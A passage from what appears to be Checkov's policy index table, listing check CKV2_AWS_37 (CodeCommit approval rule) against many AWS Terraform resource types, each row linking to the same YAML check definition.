CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 715 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 716 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 717 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 718 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 719 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 720 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 721 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 722 | CKV2_AWS_37 | resource | aws_dms_replication_instance | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 723 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 724 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 725 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 726 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 727 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 728 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 
729 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 730 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 731 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 732 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 733 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 734 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 735 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 736 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 737 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 738 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 739 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 740 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 741 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 742 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 743 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 744 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 745 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 746 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 747 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 748 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 749 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 750 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 751 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 752 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 753 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 754 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 755 | CKV2_AWS_37 | resource | 
aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 756 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 757 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 758 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 759 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 760 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 761 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 762 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 763 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 764 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 765 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 766 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 767 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 768 | CKV2_AWS_37 | resource | 
aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 769 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 770 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 771 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 772 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 773 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 774 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 775 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 776 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 777 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 778 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 779 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 780 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 781 | CKV2_AWS_37 | resource | 
aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 782 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 783 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 784 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 785 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 786 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 787 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 788 | 
CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 789 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 790 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 791 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 792 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 793 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 794 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 795 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 796 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 797 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 798 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 799 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 800 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 801 | 
CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 802 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 803 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 804 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 805 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 806 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 807 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 808 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 809 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 810 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 811 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 812 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 813 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 814 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 815 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 816 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 817 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 818 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | 